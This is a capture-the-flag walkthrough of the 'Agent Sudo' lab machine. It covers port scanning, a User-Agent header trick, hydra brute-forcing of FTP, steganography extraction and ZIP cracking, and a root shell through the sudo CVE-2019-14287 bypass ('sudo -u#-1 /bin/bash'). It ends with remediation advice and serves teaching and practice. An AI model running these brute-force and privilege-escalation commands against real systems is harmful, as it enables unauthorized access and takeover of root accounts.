Target IP: agent.thm (Requires /etc/hosts entry)
Difficulty: Easy (CTF-Heavy)
Objective: User (user.txt) & Root (root.txt) Flags
1. Executive Summary
“Agent Sudo” is a Capture-The-Flag (CTF) focused machine that emphasizes Enumeration and Steganography. Initial access requires identifying a hidden context via User-Agent manipulation, followed by FTP credential brute-forcing. Identifying information hidden within images (Steganography) leads to SSH credentials. Privilege escalation exploits a logical vulnerability in Sudo (CVE-2019-14287), allowing a restricted user to execute commands as root by specifying a non-existent User ID (-1).
Key TTPs (MITRE ATT&CK):
- T1595 (Active Scanning): Nmap port enumeration.
- T1190 (Exploit Public-Facing App): Header manipulation (User-Agent) to bypass access controls.
- T1110 (Brute Force): Hydra against FTP service.
- T1027 (Obfuscated Files or Information): Steganography in image files.
- T1068 (Exploitation for Privilege Escalation): Sudo Security Policy Bypass (CVE-2019-14287).
2. Operational Setup
OpSec Note: Always define your target in /etc/hosts. It prevents mistakes and makes your report readable.
Host Configuration
# Replace 10.10.x.x with the target IP
echo "10.10.x.x agent.thm" | sudo tee -a /etc/hostsWorkspace Preparation (Tmux)
- Pane 1 (Recon):
nmap,curl,gobuster. - Pane 2 (Tools):
hydra,binwalk,steghide. - Pane 3 (Access): SSH connection.
3. Enumeration: “What do we see?”
A. Network Scanning
We start with a standard Nmap scan to identify the attack surface.
nmap -sC -sV -oA nmap/agent agent.thmResults:
- 21/tcp (FTP):
vsftpd 3.0.3. - 22/tcp (SSH):
OpenSSH 7.6p1. - 80/tcp (HTTP):
Apache 2.4.29.
B. Web Enumeration & The “Hairan” Part
Visiting http://agent.thm shows a generic “Announce your codename” message.
Standard directory brute-forcing (Gobuster/Feroxbuster) yields nothing.
The Logic:
The site asks for a “codename.” In HTTP, clients identify themselves via the User-Agent header. If the site expects a specific “Agent,” we might need to change our identity.
The Discovery: You found that setting the User-Agent to “C” triggers a different response.
curl -I -A "C" http://agent.thmResponse:
Location: /agent_C_attention.php
Analysis:
Navigating to agent_C_attention.php reveals a message:
“Chris, you need to use your own password… to upload the photos…”
- Username Found:
chris - Context: FTP (uploading photos).
4. Initial Access: The Chain
A. FTP Brute Force
We have a username (chris) and an open FTP port. Since we don’t have a password, we brute-force it.
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://agent.thm -I- Result: Password found ->
crystal.
B. Exfiltration
Login to FTP and download the evidence.
ftp agent.thm
# User: chris, Pass: crystal
binary # Switch to binary mode (crucial for images)
mget * # Download all files (cutie.png, cute-alien.jpg)
byeC. Steganography (The CTF Layer)
We have two images. We must check them for hidden data.
**File 1: cutie.png**
We use binwalk to check for file signatures hidden inside the binary data.
binwalk -e cutie.png- Result: It extracts a ZIP file (
8702.zip). - Challenge: The ZIP is password protected.
Cracking the ZIP:
zip2john _cutie.png.extracted/8702.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt- Result: Password ->
alien. - Content:
To_agentR.txtcontaining a base64 stringQXJlYTUx. - Decoding:
echo "QXJlYTUx" | base64 -d-> “Area51”.
**File 2: cute-alien.jpg**
Now we have a passphrase (“Area51”) and another image. We use steghide.
steghide extract -sf cute-alien.jpg -p Area51- Result:
message.txt. - Credentials:
james:hackerrules!
D. SSH Access
ssh james@agent.thm
# Password: hackerrules!
cat user.txt5. Privilege Escalation: Sudo (CVE-2019-14287)
Enumeration
Always check sudo -l first.
sudo -lOutput:
(ALL, !root) /bin/bashAnalysis:
- We can run
/bin/bashas any user (ALL). - EXCEPT root (
!root).
The Exploit Logic
This configuration is vulnerable to CVE-2019-14287.
Sudo parses user IDs (UIDs). When you specify a user with -u, sudo checks if it’s allowed.
However, if you pass the User ID -1 (or its unsigned equivalent 4294967295), the function that converts the string to a user ID returns -1.
In the Sudo logic, -1 often means “no user ID specified” or “unchanged,” but essentially, it tricks Sudo into thinking “I am not choosing root (UID 0),” bypassing the !root check. However, the system eventually interprets -1 as 0 (root) when spawning the process.
Exploitation
sudo -u#-1 /bin/bash- Result: We drop into a root shell.
- Flag:
cat /root/root.txt.
6. Alternative Vectors & Extras
A. Manual “User-Agent” Hunting (Burp Suite)
If curl feels too manual, use Burp Suite Intruder.
- Capture the request to
http://agent.thm. - Send to Intruder.
- Highlight the User-Agent string.
- Payloads: A simple list
A,B,C,D… or a dictionary of common Agent names. - Look for changes in Content-Length or 3xx Redirects.
B. Cracking ZIPs (7z)
If binwalk fails you, 7z l cutie.png can sometimes see the file structure if it’s just concatenated.
C. OSINT (The Alien Photo)
You mentioned downloading Alien_autospy.jpg.
- Action:
scp james@agent.thm:Alien_autospy.jpg . - Google Lens: Uploading this image usually points to the “Roswell Incident” or “Fox Alien Autopsy.” This is lore, but in some CTFs, the “password” is the name of the incident or location found via OSINT.
7. Remediation (Blue Team)
- Patch Sudo:
- Update
sudoto version 1.8.28 or higher immediately. This bug allows simple bypass of restricted sudo profiles.
- Fix Web Logic:
- Do not rely on
User-Agentfor authentication or hiding content. It is a client-controlled header and provides zero security.
- Secure FTP:
- Disable FTP if not needed; use SFTP (over SSH) instead.
- Enforce strong password policies to prevent
hydrabrute-forcing (chris:crystalis too weak). - Implement Fail2Ban to block repeated failed login attempts.